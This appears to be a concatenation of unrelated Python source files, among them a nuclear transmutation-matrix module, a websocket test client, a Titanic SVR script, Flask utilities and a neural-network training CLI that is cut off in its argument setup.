path='MenuBar/Test', group='Fred',
class_name='envisage.ui.workbench.action.api:AboutAction'
),
Action(
path='MenuBar/Test', group='Fred',
class_name='acme.workbench.action.new_view_action:NewViewAction'
),
Action(
path='ToolBar',
class_name='envisage.ui.workbench.action.api:AboutAction'
),
Action(
path='ToolBar',
class_name='envisage.ui.workbench.action.api:ExitAction'
),
Action(
path='ToolBar/Fred', group='AToolBarGroup',
class_name='envisage.ui.workbench.action.api:AboutAction'
),
Action(
path='ToolBar/Wilma',
class_name='envisage.ui.workbench.action.api:AboutAction'
),
Action(
path='ToolBar/Barney',
class_name='envisage.ui.workbench.action.api:ExitAction'
)
]
#### 'WorkbenchActionSet' interface #######################################
# The Ids of the perspectives that the action set is enabled in.
enabled_for_perspectives = ['Foo']
# The Ids of the perspectives that the action set is visible in.
visible_for_perspectives = ['Foo', 'Bar']
# The Ids of the views that the action set is enabled for.
#enabled_for_views = ['Red']
# The Ids of the views that the action set is visible for.
#visible_for_views = ['Red']
#### EOF ######################################################################
|
python
|
"""This module provide the builder for the zlib library."""
import logging
from nvp.components.build import BuildManager
from nvp.nvp_builder import NVPBuilder
logger = logging.getLogger(__name__)
def register_builder(bman: BuildManager):
"""Register the build function"""
bman.register_builder('zlib', Builder(bman))
class Builder(NVPBuilder):
"""zlib builder class."""
def build_on_windows(self, build_dir, prefix, _desc):
"""Build on windows method"""
self.run_cmake(build_dir, prefix, ".")
self.run_ninja(build_dir)
def build_on_linux(self, build_dir, prefix, desc):
"""Build on linux method"""
self.run_cmake(build_dir, prefix, ".")
self.run_ninja(build_dir)
|
python
|
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
import matplotlib.animation as animation
def animale_array(xm,fname,lbls=None,cmap='gray',figsize=(7,7),fps=25,vmin=None,vmax=None):
'''
This function helps to make an animation from a (2+1+1)d array (xy+t+c)
'''
# from IPython.display import HTML
fig, ax = plt.subplots(figsize=figsize)
ax.set_xlim((0, xm.shape[1]))
ax.set_ylim((0, xm.shape[2]))
ax.axis('off')
if not lbls is None:
plt.title(lbls[0],fontsize=10)
plt.tight_layout()
im = ax.imshow(np.flipud(xm[0,:,:]),cmap=cmap,vmin=vmin,vmax=vmax)
pbar = tqdm(total=len(xm))
def init():
im.set_data(np.flipud(xm[0,:,:]))
if not lbls is None:
plt.title(lbls[0],fontsize=10)
return (im,)
# animation function. This is called sequentially
def animate(i):
pbar.update(1)
data_slice = np.flipud(xm[i,:,:])
im.set_data(data_slice)
if not lbls is None:
plt.title(lbls[i],fontsize=10)
return (im,)
# call the animator. blit=True means only re-draw the parts that have changed.
anim = animation.FuncAnimation(fig, animate, init_func=init,
frames=xm.shape[0], interval=200, blit=True)
# HTML(anim.to_html5_video())
# Set up formatting for the movie files
Writer = animation.writers['ffmpeg']
writer = Writer(fps=fps, metadata=dict(artist='Me'), bitrate=1000)
anim.save(fname+'.mp4', writer=writer)
|
python
|
import asyncio
import json
import logging
import random
import time
import uuid
import websockets
from common import Client, ClientReport, OffsetTransform, Position, Rotation
logging.basicConfig(level=logging.INFO)
TIME_BETWEEN_UPDATES = 0.0166
LOW_POSITION = -3.0
HIGH_POSITION = 3.0
LOW_ROTATION = 0.0
HIGH_ROTATION = 360
client = Client(
name=str(uuid.uuid4()),
timestamp=time.time()
)
def randomize_offset_values():
if client.offset_transform is None:
client.offset_transform = OffsetTransform(
Position(
(random.uniform(LOW_POSITION, HIGH_POSITION),
random.uniform(LOW_POSITION, HIGH_POSITION),
random.uniform(LOW_POSITION, HIGH_POSITION))
),
Rotation(
(random.uniform(LOW_ROTATION, HIGH_ROTATION),
random.uniform(LOW_ROTATION, HIGH_ROTATION),
random.uniform(LOW_ROTATION, HIGH_ROTATION))
)
)
async def hello():
uri = "ws://0.0.0.0:6789"
async with websockets.connect(uri, ping_interval=None) as websocket:
client_report = ClientReport(client)
client_connection_message = dict(client_report.to_dict())
client_connection_message["type"] = "connect"
await websocket.send(json.dumps(client_connection_message))
while True:
randomize_offset_values()
client.timestamp = time.time()
client_report = ClientReport(client)
client_sync_message = dict(client_report.to_dict())
client_sync_message["type"] = "sync"
await websocket.send(json.dumps(client_sync_message))
greeting = await websocket.recv()
logging.info(greeting)
await asyncio.sleep(TIME_BETWEEN_UPDATES)
asyncio.get_event_loop().run_until_complete(hello())
asyncio.get_event_loop().run_forever()
|
python
|
import logging
import os
from pathlib import Path
from flatpaksync.commands.command import command
from flatpaksync.configs.write import write as writeconfig
from flatpaksync.structs.app import app
from flatpaksync.structs.settings import settings
from flatpaksync.actions.app import app as appaction
from flatpaksync.parsers.repo import repo as parserepo
from flatpaksync.parsers.app import app as parseapp
from flatpaksync.actions.repo import repo as repoaction
mylog = logging.getLogger("fps")
class generate(command):
def __init__(self):
super().__init__()
def execute(self):
if self.conf.endswith(".config/flatpak-sync/flatpak.json"):
confPath = os.path.dirname(os.path.realpath(self.conf))
Path(confPath).mkdir(parents=True, exist_ok=True)
# Get Installed Repos
raction = repoaction()
output = raction.list()
rparse=parserepo()
rparse.parse(output)
# Get Installed Apps
action = appaction()
output = action.list()
parse = parseapp()
if parse.parse(output):
fpsettings = settings()
applist = parse.getAppList()
repolist = rparse.getRepoList()
# Write configuration
wconfig = writeconfig(self.conf)
wconfig.setSettings(fpsettings)
wconfig.setRepoList(repolist)
wconfig.setAppList(applist)
if wconfig.write():
mylog.info('Successfully wrote configuration')
else:
mylog.error('Failed to write configuration')
else:
mylog.echo('Failed to parse apps')
|
python
|
"""generatedata
Function that collects the transmutation data and
prepares the transmutation matrix required for depletion or decay
calculations.
The following reactions are considered:
- Radiative capture
- Capture to ground state
- Capture to metastable
- n, 2n
- n, 3n
- Fission
- n, alpha
- n, proton
- n, deuteron
- n, tritium
Created on Sat Oct 09 11:30:00 2021 @author: Dan Kotlyar
Last updated on Sat Oct 16 00:30:00 2021 @author: Dan Kotlyar
"""
import numpy as np
import numbers
from pyIsoDep import setDataPath
from pyIsoDep.functions.loaddecaydata import DecayData
from pyIsoDep.functions.checkerrors import _exp2dshape, _is1darray,\
_isequallength, _isnonNegativeArray, _is2darray, _inrange
from pyIsoDep.functions.header import H5_PATH, BARN_2_CM2, JOULE_2MEV,\
IDX_XS, DATA_ATTR
class TransmutationData:
"""Container to store all the information required to perform depletion
The dacay data can be read from a pre-generated hdf5 file. The latter
also includes fission yields and branching ratios.
Cross sections can be directly read via the ``read`` method.
If fission yields or branching ratios are provided then they will be used
to overwrite existing values within the library.
Parameters
----------
libraryFlag : bool
A flag to indicate whether a pre-generated library is used.
h5path : str
Full directory path to the hdf5 data library file
wgtFY : float
fission yield weighting factor between the thermal and fast fission
yields, i.e. <fy> = wgt*fyThermal + (1-wgt)*fyFast. Provided, the
pre-generated library is used, otherwise it is a redundant parameter.
Attributes
----------
fullId : 1-dim array
Nuclides ZAID number (e.g., 541350)
nIsotopes : int
Number of isotopes
AW : 1-dim array
Atomic weight
Q : 1-dim array
Decay heat coefficient for each isotope in W/Bq
BR : 1-dim array
branchin ratio that lead to a isomeric state
lmbda : 1-dim array
decay constants in 1/sec
decaymtx : 2-dim array
Decay matrix
ingestion : 1-dim array
Ingestion coefficients in Sv/Bq
inhalation : 1-dim array
Inhalattion coefficients in Sv/Bq
fymtx : 2-dim array
fission yields matrix for all the fathers-daughters isotopes
Returns
-------
2-dim array
Transmutation matrix
Examples
--------
>>> xs = TransmutationData(libraryFlag=True)
"""
def __init__(self, libraryFlag=True, h5path=None, wgtFY=0.0):
"""reset values with a complete list of all the nuclides"""
self.libraryFlag = libraryFlag
# load the decay data
if libraryFlag:
if h5path is None:
h5DefaultPath = setDataPath(H5_PATH)
datalib = DecayData(h5DefaultPath)
else:
datalib = DecayData(h5path)
_inrange(wgtFY, "Fission yield weight", [0.0, 1.0])
self.fullId = np.array(datalib.getvalues("IDlist"), dtype=int)
self.nIsotopes = len(self.fullId)
self.AW = datalib.getvalues("AW")
self.Q = datalib.getvalues("Q")
self.BR = datalib.getvalues("BR")
self.lmbda = datalib.getvalues("lambda")
self.decaymtx = datalib.getvalues("decayMatrix")
self.ingestion = datalib.getvalues("ingestion")
self.inhalation = datalib.getvalues("inhalation")
self.fymtx = wgtFY*datalib.getvalues("thermalFY") +\
(1-wgtFY)*datalib.getvalues("fastFY")
else:
self.fullId = None
self.nIsotopes = None
self.AW = None
self.Q = None
self.BR = None
self.lmbda = None
self.decaymtx = None
self.ingestion = None
self.inhalation = None
self.fymtx = None
def ReadData(self, ID, sig_f, sig_c, sig_c2m=None, sig_n2n=None,
sig_n3n=None, sig_alpha=None, sig_p=None, sig_d=None,
sig_t=None, fymtx=None, EfissMeV=None, BR=None,
decaymtx=None, flagBarns=True):
"""Read data and build the transmutation matrix
Parameters
----------
ID : 1-dim array
Partial array of nuclides for which cross sections are provided
sig_f : 1-dim array
Fission cross sections in barns
sig_c : 1-dim array
Radiative capture cross sections in barns
sig_c2m : 1-dim array
Radiative capture cross sections leading to metastable in barns
sig_n2n : 1-dim array
n, 2n in barns
sig_n3n : 1-dim array
n, 3n in barns
sig_alpha : 1-dim array
(n, alpha) in barns
sig_p : 1-dim array
(n, proton) in barns
sig_d : 1-dim array
(n, deuterium) in barns
sig_t : 1-dim array
(n, tritium) in barns
EfissMeV : 1-dim array
fission energy in MeV for all the isotopes
BR : 1-dim array
Branching ratios that lead to an isomeric state
fymtx : 2-dim array
fission yields matrix for all the fathers-daughters isotopes
decaymtx : 2-dim array
decay matrix
flagBarns : bool
if true cross sections are provided in barns otherwise in cm**2
Returns
-------
2-dim array
Transmutation matrix
Raises
------
KeyError
If any of the arrays is not an array.
TypeError
If any of the arrays is not an array.
ValueError
If any of the arrays have neagtive values or are not of equal size
Examples
--------
>>> xs = TransmutationData(libraryFlag=True)
>>> xs.ReadData(ID, sig_f, sig_c)
"""
# store the 1-gr cross sections in a matrix
# ---------------------------------------------------------------------
xsData =\
self._storexs(ID, sig_f, sig_c, sig_c2m, sig_n2n, sig_n3n,
sig_alpha, sig_p, sig_d, sig_t, fymtx, EfissMeV, BR,
decaymtx, flagBarns)
# For each parent define the products for all the possible reactions
# e.g. 922350 absorbs a neutron and leads to 922360
# ---------------------------------------------------------------------
# the starting index corresponds to the radiative capture reaction idx
idxC = IDX_XS["c"]
# empty matrix to store products ID's
prodcutsIDs = np.zeros((self.nIsotopes, len(IDX_XS)-idxC))
# change ID for isomers to find correct daughters
parents = np.around(self.fullId, -1)
prodcutsIDs[:, IDX_XS["c"]-idxC] = parents + 10 # n,c - ground
prodcutsIDs[:, IDX_XS["c2m"]-idxC] = parents + 11 # n,c - meta
prodcutsIDs[:, IDX_XS["n2n"]-idxC] = parents - 10 # n,2n
prodcutsIDs[:, IDX_XS["n3n"]-idxC] = parents - 20 # n,3n
prodcutsIDs[:, IDX_XS["alpha"]-idxC] = parents - 20030 # alpha
prodcutsIDs[:, IDX_XS["p"]-idxC] = parents - 10000 # proton
prodcutsIDs[:, IDX_XS["d"]-idxC] = parents - 10010 # deuteron
prodcutsIDs[:, IDX_XS["t"]-idxC] = parents - 10020 # tritium
prodcutsIDs[prodcutsIDs < 100] = 0
# Create the 1-g transmutation matrix (without fission components)
# ---------------------------------------------------------------------
trmtx = np.zeros((self.nIsotopes, self.nIsotopes))
# fill diagonal with negative absorption values
np.fill_diagonal(trmtx, -xsData[:, IDX_XS["abs"]])
for idxrow in range(self.nIsotopes):
for idxcol, product in enumerate(prodcutsIDs[idxrow, :]):
trmtx[self.fullId == product, idxrow] =\
xsData[idxrow, idxcol+idxC]
# Create the product between fission yields and fission cross sections
# ---------------------------------------------------------------------
fissmtrx = np.tile(xsData[:, IDX_XS["f"]], (self.nIsotopes, 1))
fissmtrx *= self.fymtx
# Final transmutation matrix
# ---------------------------------------------------------------------
trmtx += fissmtrx
self.transmutationmtx = trmtx
def Condense(self, ID, printWarnings=False):
"""Condense all the data to contain only a given list of isotopes
Parameters
----------
ID : 1-dim array
List of nuclides
printWarnings : bool
Flag to indicate whether warnings should be printed
Raises
------
ValueError
If any of the arrays have neagtive values or are not of equal size
"""
# Check that ID is a non-negative 1-dim array
# ---------------------------------------------------------------------
ID = np.array(ID)
_is1darray(ID, "ID array")
_isnonNegativeArray(ID, "ID array")
# intersect between the full and given list of nuclides
# ---------------------------------------------------------------------
vals, idxFull, idxPart =\
np.intersect1d(self.fullId, ID, assume_unique=True,
return_indices=True)
# filter the data according to the provided ID array
# ---------------------------------------------------------------------
attrFlag = False
for attr in DATA_ATTR.keys():
if hasattr(self, attr):
attrFlag = True
val = getattr(self, attr)
if isinstance(val, numbers.Real):
setattr(self, attr, len(idxPart))
elif val.ndim == 1:
setattr(self, attr, val[idxFull])
elif attr == "xsData":
setattr(self, attr, val[idxFull, :])
else: # 2-dim array
setattr(self, attr, val[:, idxFull][idxFull, :])
else:
if printWarnings:
print("No attribute <{}> in the container".format(attr))
if not attrFlag:
raise ValueError("No attributes at all within the class")
def _storexs(self, ID, sig_f, sig_c, sigc2m, sig_n2n, sig_n3n,
sig_alpha, sig_p, sig_d, sig_t, fymtx, EfissMeV, BR,
decaymtx, flagBarns):
"""store all the cross section in a specific format"""
# get all the cross sections in a single matrix (includes IDs)
# get the fission energy, fission yields matrix, and decay matrix
xsDataPart, EfissMeVPart, fymtxPart, decaymtxPart = _checkxs(
ID, sig_f, sig_c, sigc2m, sig_n2n, sig_n3n, sig_alpha, sig_p,
sig_d, sig_t, fymtx, EfissMeV, BR, decaymtx, flagBarns)
# External data library is not provided
if not self.libraryFlag:
nIsotopes = len(ID)
self.fullId = ID
self.nIsotopes = nIsotopes
self.xsData = xsDataPart
self.EfissMeV = EfissMeVPart
self.EfissJoule = EfissMeVPart / JOULE_2MEV
self.fymtx = fymtxPart
self.decaymtx = decaymtxPart
return xsDataPart
# intersect between the full and partial list of nuclides
vals, idxFull, idxPart =\
np.intersect1d(self.fullId, ID, assume_unique=True,
return_indices=True)
# Build a matrix to store cross sections for the full list of nuclides
xsData = np.zeros((self.nIsotopes, len(IDX_XS)))
xsData[idxFull, :] = xsDataPart[idxPart, :] # populate the data
# Energy per fission for all the nuclides
EfissMeV = np.zeros(self.nIsotopes)
EfissMeV[idxFull] = EfissMeVPart[idxPart]
EfissJoule = EfissMeV / JOULE_2MEV # convert MeV to Joules
# Multiply metastable capture cross section with the branching ratio
if BR is None:
xsData[:, IDX_XS["c2m"]] = xsData[:, IDX_XS["c"]] * self.BR
xsData[:, IDX_XS["c"]] = xsData[:, IDX_XS["c"]] * (1 - self.BR)
# Overwrite a pre-generated fission matrix
if fymtxPart is not None:
fymtx = np.zeros((self.nIsotopes, self.nIsotopes))
for idx in range(len(idxFull)):
fymtx[idxFull, idxFull[idx]] = fymtxPart[idxPart, idxPart[idx]]
self.fymtx = fymtx
# Store the matrix with the cross sections
self.xsData = xsData
self.EfissMeV = EfissMeV
self.EfissJoule = EfissJoule
return xsData
# -----------------------------------------------------------------------------
# Supplementary functions to check errors
# -----------------------------------------------------------------------------
def _checkxs(ID, sig_f, sig_c, sigc2m, sig_n2n, sig_n3n, sig_alpha, sig_p,
sig_d, sig_t, fymtx, EfissMeV, BR, decaymtx, flagBarns):
"""check that all the cross sections are properly provided"""
_is1darray(ID, "Nuclides Ids")
numN = len(np.unique(ID)) # number of unique isotopes
_isequallength(ID, numN, "Nuclides Ids")
ID = np.array(ID, dtype=int)
if sig_c is None:
sig_c = np.zeros(numN)
else:
sig_c = np.array(sig_c)
if sigc2m is None:
sigc2m = np.zeros(numN)
else:
sigc2m = np.array(sigc2m)
if sig_n2n is None:
sig_n2n = np.zeros(numN)
else:
sig_n2n = np.array(sig_n2n)
if sig_n3n is None:
sig_n3n = np.zeros(numN)
else:
sig_n3n = np.array(sig_n3n)
if sig_f is None:
sig_f = np.zeros(numN)
else:
sig_f = np.array(sig_f)
if sig_alpha is None:
sig_alpha = np.zeros(numN)
else:
sig_alpha = np.array(sig_alpha)
if sig_p is None:
sig_p = np.zeros(numN)
else:
sig_p = np.array(sig_p)
if sig_d is None:
sig_d = np.zeros(numN)
else:
sig_d = np.array(sig_d)
if sig_t is None:
sig_t = np.zeros(numN)
else:
sig_t = np.array(sig_t)
if EfissMeV is None:
EfissMeV = _FissionEnergy(ID)
else:
EfissMeV = np.array(EfissMeV, dtype=float)
if BR is not None:
BR = np.array(BR)
# check if all variables are 1-dim arrays
_is1darray(sig_c, "Capture XS")
_is1darray(sigc2m, "Capture to metastable XS")
_is1darray(sig_n2n, "(n, 2n) XS")
_is1darray(sig_n3n, "(n, 3n) XS")
_is1darray(sig_f, "(n, fission) XS")
_is1darray(sig_alpha, "(n, alpha) XS")
_is1darray(sig_p, "(n, proton) XS")
_is1darray(sig_d, "(n, deutron) XS")
_is1darray(sig_t, "(n, tritium) XS")
_is1darray(EfissMeV, "Fission energy in MeV")
if BR is not None:
_is1darray(BR, "Branching ratios")
if fymtx is not None:
fymtx = np.array(fymtx)
_is2darray(fymtx, "Fission yields matrix")
if decaymtx is not None:
decaymtx = np.array(decaymtx)
_is2darray(decaymtx, "Decay matrix")
# check that all variables are with the same size
_isequallength(sig_c, numN, "Capture XS")
_isequallength(sigc2m, numN, "Capture to metastable XS")
_isequallength(sig_n2n, numN, "(n, 2n) XS")
_isequallength(sig_n3n, numN, "(n, 3n) XS")
_isequallength(sig_f, numN, "(n, fission) XS")
_isequallength(sig_alpha, numN, "(n, alpha) XS")
_isequallength(sig_p, numN, "(n, proton) XS")
_isequallength(sig_d, numN, "(n, deutron) XS")
_isequallength(sig_t, numN, "(n, tritium) XS")
_isequallength(EfissMeV, numN, "Fission energy in MeV")
if BR is not None:
_isequallength(BR, numN, "Branching ratios")
if fymtx is not None:
_exp2dshape(fymtx, (numN, numN), "Fission yields matrix")
if decaymtx is not None:
_exp2dshape(decaymtx, (numN, numN), "Decay matrix")
# check if all variables do not contain negative values
_isnonNegativeArray(sig_c, "Capture XS")
_isnonNegativeArray(sigc2m, "Capture to metastable XS")
_isnonNegativeArray(sig_n2n, "(n, 2n) XS")
_isnonNegativeArray(sig_n3n, "(n, 3n) XS")
_isnonNegativeArray(sig_f, "(n, fission) XS")
_isnonNegativeArray(sig_alpha, "(n, alpha) XS")
_isnonNegativeArray(sig_p, "(n, proton) XS")
_isnonNegativeArray(sig_d, "(n, deutron) XS")
_isnonNegativeArray(sig_t, "(n, tritium) XS")
_isnonNegativeArray(EfissMeV, "Fission energy in MeV")
if BR is not None:
_isnonNegativeArray(BR, "Branching ratios")
if fymtx is not None:
_isnonNegativeArray(fymtx, "Fission yields matrix")
# builds xs data matrix to store all the cross sections
xsData = np.zeros((numN, len(IDX_XS)))
# Absorption cross section
sig_abs = sig_c + sigc2m + sig_n2n + sig_n3n + sig_f + sig_alpha + sig_p +\
sig_d + sig_t
if flagBarns:
convUnits = BARN_2_CM2
else:
convUnits = 1.0
xsData[:, IDX_XS["id"]] = ID
xsData[:, IDX_XS["abs"]] = sig_abs * convUnits
xsData[:, IDX_XS["c"]] = sig_c * convUnits
xsData[:, IDX_XS["c2m"]] = sigc2m * convUnits
xsData[:, IDX_XS["n2n"]] = sig_n2n * convUnits
xsData[:, IDX_XS["n3n"]] = sig_n3n * convUnits
xsData[:, IDX_XS["f"]] = sig_f * convUnits
xsData[:, IDX_XS["alpha"]] = sig_alpha * convUnits
xsData[:, IDX_XS["p"]] = sig_p * convUnits
xsData[:, IDX_XS["d"]] = sig_d * convUnits
xsData[:, IDX_XS["t"]] = sig_t * convUnits
if BR is not None:
xsData[:, IDX_XS["c2m"]] = sig_c * BR
xsData[:, IDX_XS["c"]] = sig_c * (1 - BR)
return xsData, EfissMeV, fymtx, decaymtx
# Obtain the energy per fission for the defined isotopes
# -------------------------------------------------------------------------
def _FissionEnergy(ID):
"""Get the fission energy for the actinides (expression from ORIGEN)"""
idxNonFiss = ID < 900000 # indices for all the non-actinides
Z = np.floor(ID / 10000) # number of protons
A = np.floor((ID - Z * 10000) / 10) # num of protons+neutrons
energyFissMeV = 1.29927e-3 * (Z**2 * A**0.5) + 33.12
energyFissMeV[idxNonFiss] = 0.0
return energyFissMeV
|
python
|
import pandas as pd
from sklearn.metrics import r2_score
from sklearn.svm import SVR
MAX_AGE = 71
MAX_PCLASS = 3
def process_df(df):
df = df[['pclass', 'survived', 'age', 'sex']]
df = df.dropna()
df['pclass'] = df['pclass'].map(lambda x: float(x[:-2]) / MAX_PCLASS) # drop sufix
df['age'] = df['age'].map(lambda x: x / MAX_AGE)
def transform_to_num(df):
l = list({i for i in df})
return df.map(lambda x: l.index(x))
df['sex'] = transform_to_num(df['sex'])
return df
test = process_df(pd.read_csv('titanic_test.csv'))
train = process_df(pd.read_csv('titanic_train.csv'))
test_X, test_Y = test.drop(columns=['survived']), test['survived']
train_X, train_Y = train.drop(columns=['survived']), train['survived']
def score(kernel):
regr = SVR(kernel=kernel)
regr.fit(train_X, train_Y)
pred_Y = regr.predict(test_X)
print('%s, R2 score: %f' % (kernel, r2_score(test_Y, pred_Y)))
print('%s, Intercept: %f' % (kernel, regr.intercept_))
score('linear')
score('poly')
score('rbf')
|
python
|
import datetime
import calendar
from posixpath import dirname
import os
import pytz
import lockfile
import pycountry
import geoip2.errors
from flask.ext.babel import lazy_gettext
from flask import url_for
from flask.helpers import find_package
import rfk
def now():
return pytz.utc.localize(datetime.datetime.utcnow())
def to_timestamp(datetime):
return int(calendar.timegm(datetime.timetuple())) * 1000
def get_location(address):
try:
location = rfk.geoip.city(address)
except geoip2.errors.AddressNotFoundError:
return {}
ret = {}
if location.city.name is not None:
ret['city'] = location.city.name
if location.country.iso_code is not None:
try:
if location.country.iso_code == 'DE' and location.subdivisions[0].iso_code == 'BY':
ret['country_code'] = 'BAY'
elif location.country.iso_code == 'US' and location.subdivisions[0].iso_code == 'TX':
ret['country_code'] = 'TEX'
else:
ret['country_code'] = location.country.iso_code
except IndexError:
ret['country_code'] = location.country.iso_code
return ret
def get_path(path='', internal=False):
if os.path.isabs(path):
return path
prefix, package_path = find_package(__name__)
if prefix is not None and not internal:
return os.path.join(prefix, path)
elif package_path is not None:
return os.path.join(package_path, path)
raise ValueError
def natural_join(lst):
l = len(lst);
if l <= 2:
return lazy_gettext(' and ').join(lst)
elif l > 2:
first = ', '.join(lst[0:-1])
return "%s %s %s" % (first, lazy_gettext('and'), lst[-1])
def make_user_link(user):
return '<a href="%s" title="%s">%s</a>' % (url_for('user.info', user=user.username), user.username, user.username);
def iso_country_to_countryball(isocode):
"""returns the countryball for given isocode
omsk if file not found"""
if isocode is None:
return 'unknown.png'
if isocode == 'BAY':
isocode = 'bavaria'
elif isocode == 'TEX':
isocode = 'texas'
isocode = isocode.lower()
# rather dirty hack to get the path
basepath = os.path.join(dirname(dirname(__file__)), 'static', 'img', 'cb')
if rfk.CONFIG.has_option('site', 'cbprefix'):
prebasepath = os.path.join(basepath, rfk.CONFIG.get('site', 'cbprefix'))
if os.path.exists(os.path.join(prebasepath, '{}.png'.format(isocode))):
return '{}{}.png'.format(rfk.CONFIG.get('site', 'cbprefix'), isocode)
if os.path.exists(os.path.join(basepath, '{}.png'.format(isocode))):
return '{}.png'.format(isocode)
else:
return 'unknown.png'
def iso_country_to_countryname(isocode):
isocode = isocode.upper()
if isocode == 'BAY':
country = 'Bavaria'
elif isocode == 'TEX':
country = 'Texas'
else:
try:
country = pycountry.countries.get(alpha2=isocode).name
except KeyError:
country = 'Omsk'
return country
def get_secret_key():
secretfile = os.path.join('/tmp', 'rfksecret')
with lockfile.FileLock(secretfile):
if not os.path.exists(secretfile):
with open(secretfile,'wb') as f:
f.write(os.urandom(64))
with open(secretfile) as f:
return f.read()
|
python
|
from typing import List, Iterator, Dict
from pyot.conf.model import models
from pyot.core.functional import cache_indexes, lazy_property
from pyot.core.exceptions import NotFound
from pyot.utils.tft.cdragon import abs_url, join_set_data
from pyot.utils.lol.cdragon import sanitize
from .base import PyotCore, PyotStatic
# PYOT STATIC OBJECT
class TraitEffectData(PyotStatic):
max_units: int
min_units: int
style: int
variables: Dict[str, int]
class Meta(PyotStatic.Meta):
raws = {"variables"}
# PYOT CORE OBJECT
class Trait(PyotCore):
set: int
key: str
name: str
effects: List[TraitEffectData]
icon_path: str
description: str
class Meta(PyotCore.Meta):
rules = {"cdragon_tft_full": ["?set", "?key", "version", "locale"]}
renamed = {"api_name": "key", "desc": "description", "icon": "icon_path"}
def __init__(self, key: str = None, set: int = None, version: str = models.tft.DEFAULT_VERSION, locale: str = models.lol.DEFAULT_LOCALE):
self.initialize(locals())
if key and set is None:
self.find_set()
def find_set(self):
try:
self.set = int(self.key.split("_")[0][3:])
except Exception as e:
raise TypeError("Could not parse 'set' value from key") from e
@cache_indexes
def filter(self, indexer, data):
return indexer.get(self.key, join_set_data(data, self.set, "traits"), "apiName")
@lazy_property
def icon_abspath(self) -> str:
return abs_url(self.icon_path, self.metaroot.version)
@lazy_property
def cleaned_description(self) -> str:
return sanitize(self.description)
class Traits(PyotCore):
set: int
traits: List[Trait]
class Meta(PyotCore.Meta):
rules = {"cdragon_tft_full": ["?set", "version", "locale"]}
def __init__(self, set: int = -1, version: str = models.tft.DEFAULT_VERSION, locale: str = models.lol.DEFAULT_LOCALE):
self.initialize(locals())
def __getitem__(self, item):
if not isinstance(item, int):
return super().__getitem__(item)
return self.traits[item]
def __iter__(self) -> Iterator[Trait]:
return iter(self.traits)
def __len__(self):
return len(self.traits)
def filter(self, data):
try:
return join_set_data(data, self.set, "traits")
except KeyError as e:
raise NotFound("Request was successful but filtering gave no matching item") from e
def transform(self, data):
return {"traits": data}
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Authors: Olexa Bilaniuk
# Imports.
import sys; sys.path += [".", ".."]
import argparse as Ap
import logging as L
import numpy as np
import os, pdb, sys
import time
import tensorflow.compat.v1 as tf
__version__ = "0.0.0"
config = tf.ConfigProto()
# config.gpu_options.per_process_gpu_memory_fraction = 0.9
config.gpu_options.allow_growth = True
tf.Session(config=config)
#
# Message Formatter
#
class MsgFormatter(L.Formatter):
"""Message Formatter
Formats messages with time format YYYY-MM-DD HH:MM:SS.mmm TZ
"""
def formatTime(self, record, datefmt):
t = record.created
timeFrac = abs(t-int(t))
timeStruct = time.localtime(record.created)
timeString = ""
timeString += time.strftime("%F %T", timeStruct)
timeString += "{:.3f} ".format(timeFrac)[1:]
timeString += time.strftime("%Z", timeStruct)
return timeString
#############################################################################################################
############################## Subcommands ##################################
#############################################################################################################
class Subcommand(object):
name = None
@classmethod
def addArgParser(cls, subp, *args, **kwargs):
argp = subp.add_parser(cls.name, usage=cls.__doc__, *args, **kwargs)
cls.addArgs(argp)
argp.set_defaults(__subcmdfn__=cls.run)
return argp
@classmethod
def addArgs(cls, argp):
pass
@classmethod
def run(cls, d):
pass
class Screw(Subcommand):
"""Screw around with me in Screw(Subcommand)."""
name = "screw"
@classmethod
def run(cls, d):
print(cls.__doc__)
class Train(Subcommand):
name = "train"
LOGLEVELS = {"none":L.NOTSET, "debug": L.DEBUG, "info": L.INFO,
"warn":L.WARN, "err": L.ERROR, "crit": L.CRITICAL}
@classmethod
def addArgs(cls, argp):
argp.add_argument("-d", "--datadir", default=".", type=str,
help="Path to datasets directory.")
argp.add_argument("-w", "--workdir", default=".", type=str,
help="Path to the workspace directory for this experiment.")
argp.add_argument("-l", "--loglevel", default="info", type=str,
choices=cls.LOGLEVELS.keys(),
help="Logging severity level.")
argp.add_argument("-s", "--seed", default=0xe4223644e98b8e64, type=int,
help="Seed for PRNGs.")
argp.add_argument("--summary", action="store_true",
help="""Print a summary of the network.""")
argp.add_argument("--model", default="complex", type=str,
choices=["real", "complex"],
help="Model Selection.")
argp.add_argument("--dataset", default="cifar10", type=str,
choices=["mnist","cifar10", "others"],
help="Dataset Selection.")
argp.add_argument("--dropout", default=0, type=float,
help="Dropout probability.")
argp.add_argument("-n", "--num-epochs", default=200, type=int,
help="Number of epochs")
argp.add_argument("-b", "--batch-size", default=64, type=int,
help="Batch Size")
argp.add_argument("--start-filter", "--sf", default=11, type=int,
help="Number of feature maps in starting stage")
argp.add_argument("--num-blocks", "--nb", default=10, type=int,
help="Number of filters in initial block")
argp.add_argument("--spectral-param", action="store_true",
help="""Use spectral parametrization.""")
argp.add_argument("--spectral-pool-gamma", default=0.50, type=float,
help="""Use spectral pooling, preserving a fraction gamma of frequencies""")
argp.add_argument("--spectral-pool-scheme", default="none", type=str,
choices=["none", "stagemiddle", "proj", "nodownsample"],
help="""Spectral pooling scheme""")
argp.add_argument("--act", default="relu", type=str,
choices=["relu"],
help="Activation.")
argp.add_argument("--aact", default="modrelu", type=str,
choices=["modrelu"],
help="Advanced Activation.")
argp.add_argument("--no-validation", action="store_true",
help="Do not create a separate validation set.")
argp.add_argument("--comp_init", default='complex_independent', type=str,
help="Initializer for the complex kernel.")
optp = argp.add_argument_group("Optimizers", "Tunables for all optimizers")
optp.add_argument("--optimizer", "--opt", default="nag", type=str,
choices=["sgd", "nag", "adam", "rmsprop"],
help="Optimizer selection.")
optp.add_argument("--clipnorm", "--cn", default=1.0, type=float,
help="The norm of the gradient will be clipped at this magnitude.")
optp.add_argument("--clipval", "--cv", default=1.0, type=float,
help="The values of the gradients will be individually clipped at this magnitude.")
optp.add_argument("--l1", default=0, type=float,
help="L1 penalty.")
optp.add_argument("--l2", default=0, type=float,
help="L2 penalty.")
optp.add_argument("--lr", default=1e-3, type=float,
help="Master learning rate for optimizers.")
optp.add_argument("--momentum", "--mom", default=0.9, type=float,
help="Momentum for optimizers supporting momentum.")
optp.add_argument("--decay", default=0, type=float,
help="Learning rate decay for optimizers.")
optp.add_argument("--schedule", default="default", type=str,
help="Learning rate schedule")
optp = argp.add_argument_group("Adam", "Tunables for Adam optimizer")
